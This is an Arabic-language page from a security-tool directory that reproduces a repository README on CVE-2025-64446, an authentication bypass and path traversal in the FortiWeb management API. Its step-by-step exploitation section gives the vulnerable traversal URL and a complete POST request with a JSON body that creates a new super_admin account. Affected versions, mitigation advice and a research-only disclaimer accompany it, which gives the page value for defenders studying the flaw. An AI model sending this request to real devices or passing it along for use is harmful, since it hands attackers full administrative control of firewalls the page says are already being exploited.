Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-64446 — CVE-2025-64446 | Kitploit
أدوات/GitHubGitHub/0xblackash/cve-2025-64446
المصادقة والترخيصتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمر
GitHub0xblackash/cve-2025-64446

CVE-2025-64446

CVE-2025-64446

عرض المستودع
4منذ 5 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

🛡️ CVE-2025-64446 - تجاوز المصادقة الحرج واجتياز المسار في FortiWeb

Linux 6 15 Released (18) (1)

Severity Fortinet Exploited

ثغرة حرجة غير موثقة تسمح للمهاجمين عن بُعد بإنشاء حسابات إدارة على أجهزة FortiWeb.


📌 نظرة عامة

CVE-2025-64446 هي ثغرة اجتياز مسار نسبي خطيرة في واجهة إدارة جدار حماية تطبيقات الويب FortiWeb.

يمكن لمهاجم بعيد غير موثَّق استغلال هذا الخلل لتجاوز المصادقة وإنشاء مستخدمين إداريين جدد بصلاحيات كاملة، مما يؤدي إلى السيطرة الكاملة على الجهاز.

  • درجة CVSS v3.1: 9.8 (حرج)
  • نوع الهجوم: عن بُعد غير موثَّق
  • التأثير: استيلاء إداري كامل
  • الحالة: تم استغلاله بنشاط في البيئات الحقيقية

🛠️ الإصدارات المتأثرة

توصية: قم بالتحديث إلى أحدث إصدار مُصلَح في أقرب وقت ممكن.


🔥 كيف يستغل المهاجمون هذه الثغرة

استغلال خطوة بخطوة

  1. تحديد الهدف
    يقوم المهاجم بمسح واجهات إدارة FortiWeb المكشوفة للعامة (عادةً على منفذ HTTPS 443 أو 8443).

  2. صياغة الطلب الخبيث
    جوهر الاستغلال هو اجتياز مسار نسبي (../) مع عنوان URL مصمم خصيصًا يصل إلى نقطة نهاية CGI داخلية غير موثقة.

    نمط النقطة النهائية القابلة للاستغلال:

    root@kitploit:~
    /api/v2.0/cmdb/system/admin?.../../../../../../cgi-bin/fwbcgi
    
  3. إرسال الاستغلال

    يرسل المهاجم طلب POST واحد مع حمولة JSON لإنشاء حساب إداري جديد.

    مثال لطلب الاستغلال:

    root@kitploit:~
    POST /api/v2.0/cmdb/system/admin%3f/../../../../../cgi-bin/fwbcgi HTTP/1.1
    Host: target-fortiw eb.example.com
    Content-Type: application/json
    
    {
      "name": "hackedadmin",
      "password": "AttackerPass123!",
      "access_profile": "super_admin",
      "type": "local"
    }
    
  4. الاستغلال الناجح

    في حالة النجاح، يقوم FortiWeb بإنشاء حساب الإدارة الجديد دون الحاجة إلى أي مصادقة مسبقة. يمكن للمهاجم بعد ذلك تسجيل الدخول باستخدام بيانات الاعتماد التي تم إنشاؤها حديثًا والسيطرة الكاملة على WAF.

لماذا ينجح هذا؟

يفشل واجهة برمجة التطبيقات (API) الخاصة بالإدارة في تعقيم المسار بشكل صحيح، مما يسمح للطلب بالعودة إلى الثنائي القديم fwbcgi الذي لا يفرض المصادقة على عمليات معينة.


📸 لقطات الشاشة

Fortinet0day 3 Fortinet0day Fortinet0day 1 Fortinet0day 2

🛡️ التخفيف وأفضل الممارسات

  • قم بترقية FortiWeb فورًا إلى إصدار مُصلَح
  • لا تعرّض واجهة الإدارة مباشرة للإنترنت أبدًا
  • استخدم تجزئة شبكة قوية وVPN للوصول الإداري
  • راقب السجلات بحثًا عن طلبات تحتوي على fwbcgi أو ../ أو محاولات إنشاء إدارة غير عادية
  • راجع حسابات الإدارة بانتظام بحثًا عن إدخالات مشبوهة

لأغراض البحث الأمني التعليمي والدفاعي فقط.

مصنوع بـ ❤️ من أجل مجتمع الأمن السيبراني

آخر تحديث: أبريل 2026

تنزيل الأداة
المنتجالإصدارات المتأثرةالإصدار المُصلَح
FortiWeb 8.08.0.0 – 8.0.18.0.2 وما فوق
FortiWeb 7.67.6.0 – 7.6.47.6.5 وما فوق
FortiWeb 7.47.4.0 – 7.4.97.4.10 وما فوق
FortiWeb 7.27.2.0 – 7.2.117.2.12 وما فوق
FortiWeb 7.07.0.0 – 7.0.117.0.12 وما فوق